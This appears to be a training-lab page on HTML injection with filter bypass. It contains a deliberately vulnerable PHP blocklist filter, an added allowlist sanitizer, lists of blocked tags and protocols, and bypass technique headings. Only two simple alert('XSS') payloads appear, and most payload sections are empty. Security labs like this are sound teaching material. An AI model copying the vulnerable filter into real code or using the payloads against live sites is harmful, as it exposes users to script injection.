Lab 2: HTML Injection with Filter Bypass

HTML injection with security filters that can be bypassed

Difficulty: Medium

Lab Overview

This lab demonstrates HTML injection vulnerabilities where basic security filters are implemented but can be bypassed using various techniques. The application filters dangerous HTML tags and attributes but doesn't prevent all attack vectors.

Objective: Bypass security filters to achieve HTML injection and potentially XSS.

Vulnerable Code with Filters
<?php
// Vulnerable: basic blocklist filters that can be bypassed
function process_html_input_with_filters($input) {
    $dangerous_tags = ['script', 'iframe', 'object', 'embed', 'form'];
    $dangerous_attributes = ['onload', 'onerror', 'onclick', 'onmouseover'];
    $dangerous_protocols = ['javascript:', 'data:', 'vbscript:'];

    // Basic blocklist check (can be bypassed): a case-insensitive substring
    // match against short lists of tag names, attribute names and protocols
    $is_dangerous = false;

    foreach ($dangerous_tags as $tag) {
        if (stripos($input, '<' . $tag) !== false) {
            $is_dangerous = true;
            break;
        }
    }
    foreach ($dangerous_attributes as $attribute) {
        if (stripos($input, $attribute . '=') !== false) {
            $is_dangerous = true;
            break;
        }
    }
    foreach ($dangerous_protocols as $protocol) {
        if (stripos($input, $protocol) !== false) {
            $is_dangerous = true;
            break;
        }
    }

    // Still vulnerable to bypass techniques: anything that does not contain one of
    // the listed substrings (other tags, other attributes, encoded input) is
    // returned unchanged
    if (!$is_dangerous) {
        return $input;
    }

    // Input that matched the blocklist is rejected
    return '';
}
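The hardened counterpart to the filter above, as an added example that is not the lab's own code: instead of a blocklist, it keeps only the tags the lab lists as safe (h1, p, div, span), drops every attribute and re-escapes all text, using PHP's DOM extension so that tag names are normalised before any decision is made. The names ALLOWED_TAGS, render_children and sanitize_html_allowlist are this example's own, and it assumes PHP 7+ with ext/dom.

```php
<?php
// Added example, not the lab's code: allowlist sanitizer for the lab's safe tags.
// Assumes PHP 7+ with ext/dom. ALLOWED_TAGS and both functions are this example's names.
const ALLOWED_TAGS = ['h1', 'p', 'div', 'span'];

function render_children(DOMNode $node): string
{
    $out = '';
    foreach ($node->childNodes as $child) {
        if ($child instanceof DOMText) {
            // Text is re-escaped on output, so a "<" in text can never open a tag
            $out .= htmlspecialchars($child->nodeValue, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        } elseif ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);   // libxml already lowercases HTML names
            if ($tag === 'script' || $tag === 'style') {
                continue;                         // drop the element and everything inside
            }
            if (in_array($tag, ALLOWED_TAGS, true)) {
                // Keep the element, but none of its attributes (no on*=, href=, style=)
                $out .= "<$tag>" . render_children($child) . "</$tag>";
            } else {
                // Any other element is unwrapped: only its (escaped) text survives
                $out .= render_children($child);
            }
        }
        // Comments and processing instructions fall through and are dropped
    }
    return $out;
}

function sanitize_html_allowlist(string $input): string
{
    $doc = new DOMDocument();
    $prev = libxml_use_internal_errors(true);   // malformed markup must not emit warnings
    // The PI makes libxml read the input as UTF-8; <body> is a wrapper render_children() unwraps
    $doc->loadHTML('<?xml encoding="UTF-8"><body>' . $input . '</body>',
        LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    return render_children($doc);
}

// Constructed inputs: the lab's safe markup, its payload with case variation, and a
// safe tag carrying one of the lab's blocked event attributes
foreach (['<h1>Hello</h1><p>Paragraph</p>',
          "<ScRiPt>alert('XSS')</ScRiPt>",
          "<span onmouseover=\"alert('XSS')\">hover</span>"] as $sample) {
    echo sanitize_html_allowlist($sample), PHP_EOL;
}
```

Because the decision is made on the parsed element name rather than on the raw string, case variation, URL or entity encoding and unlisted tags or attributes no longer reach the output as markup.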
Filtered HTML Injection
Active Filters

The following are filtered:

  • Tags: script, iframe, object, embed, form, input, button, link, meta, style
  • Attributes: onload, onerror, onclick, onmouseover, onfocus, onchange, onsubmit, onkeypress, onkeydown, onkeyup
  • Protocols: javascript:, data:, vbscript:, file:, ftp:, gopher:
Safe HTML Tags

These tags should work:

  • <h1>Hello</h1> - Heading
  • <p>Paragraph</p> - Paragraph
  • <div>Container</div> - Container
  • <span>Inline</span> - Inline
Vulnerability Details
  • Type: HTML Injection with Filter Bypass
  • Severity: High
  • Method: POST
  • Issue: Inadequate security filters
Bypass Techniques
  • Case Variation: mix upper- and lower-case letters in tag and attribute names
  • Encoding: use URL-encoded or entity-encoded characters in place of the literal ones
  • Alternative Tags: use tags that are not on the blocklist
  • String Manipulation: build the HTML dynamically from fragments that are individually harmless
HTML Injection Filter Bypass Payloads

Use these payloads to bypass the security filters:

1. Case Variation Bypass:
2. Encoding Bypass:
  • <script>alert('XSS')</script>
  • %3Cscript%3Ealert('XSS')%3C/script%3E
3. Alternative Tags Bypass:
4. Attribute Bypass:
5. Protocol Bypass:
6. String Concatenation Bypass:
7. Alternative Attributes Bypass:
8. Event Handler Bypass:
9. CSS Injection Bypass:
10. Advanced Bypass Techniques:
11. Unicode and Encoding Bypass:
  • <script>alert('XSS')</script>
  • %3Cscript%3Ealert('XSS')%3C/script%3E
12. Alternative Event Handlers:
13. Data URI Bypass: